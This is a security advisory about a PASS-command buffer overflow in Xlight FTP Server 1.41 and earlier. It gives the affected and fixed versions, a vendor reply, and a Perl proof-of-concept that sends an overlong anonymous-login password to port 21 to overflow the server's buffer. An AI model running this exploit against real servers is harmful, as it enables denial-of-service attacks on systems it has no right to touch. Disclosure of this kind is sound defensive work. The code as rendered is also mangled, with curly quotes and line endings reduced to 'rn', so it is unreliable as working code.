‘Xlight FTP Server PASS Buffer Overflow’

Summary

Xlight FTP server is ‘a powerful ftp server with very small program size’. A buffer overflow vulnerability in the product has been found allowing remote attackers to overflow an internal buffer.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable systems:
 * Xlight FTP Server version 1.41 and prior

Immune systems:
 * Xlight FTP Server version 1.45

By sending an overflow long PASS command a local buffer used in Xlight FTP server can be overflowed.

Vendor status:
‘We would like to inform you that we have release a new version of Xlight ftp server 1.45 which includes solution for this buffer overflow problem. Thanks for your alert.

Best regards,
Xlight ftp support
support@xlightftpd.com’

Exploit:
#!/usr/bin/perl
#
# Exploit for Xlight FTP server long PASS vulnerability
#
use IO::Socket;
unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
                                 PeerAddr => $host,
                                 PeerPort => ‘ftp(21)’,
                                 );
unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

$remote->autoflush(1);

print $remote ‘USER anonymousrn’;
sleep(1);

$buf = ‘A’x54; # Min 54, Max 523
print $remote ‘PASS ‘.$buf.’rn’;
sleep(1);

close $remote;’

Categories: Windows